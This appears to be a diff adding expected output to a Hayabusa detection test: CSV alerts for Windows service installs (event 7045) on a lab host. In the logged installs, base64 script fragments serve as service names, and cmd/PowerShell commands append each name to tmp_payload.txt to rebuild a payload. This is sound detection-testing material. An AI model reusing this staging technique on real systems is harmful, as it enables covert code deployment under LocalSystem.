+2021-11-03 17:15:32.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:32.440 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:32.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:33.911 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:33.911 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:33.911 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:35.365 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:35.365 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:35.365 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:36.820 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:36.820 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:36.820 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:38.273 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:38.273 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:38.273 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:39.711 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:39.711 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:39.711 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:41.177 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:41.177 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:41.177 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:42.631 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:42.631 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:42.631 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:44.099 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:44.099 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:44.099 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:45.554 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:45.554 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:45.554 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:47.028 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:47.028 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:47.028 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:48.498 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:48.498 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:48.498 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:49.956 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
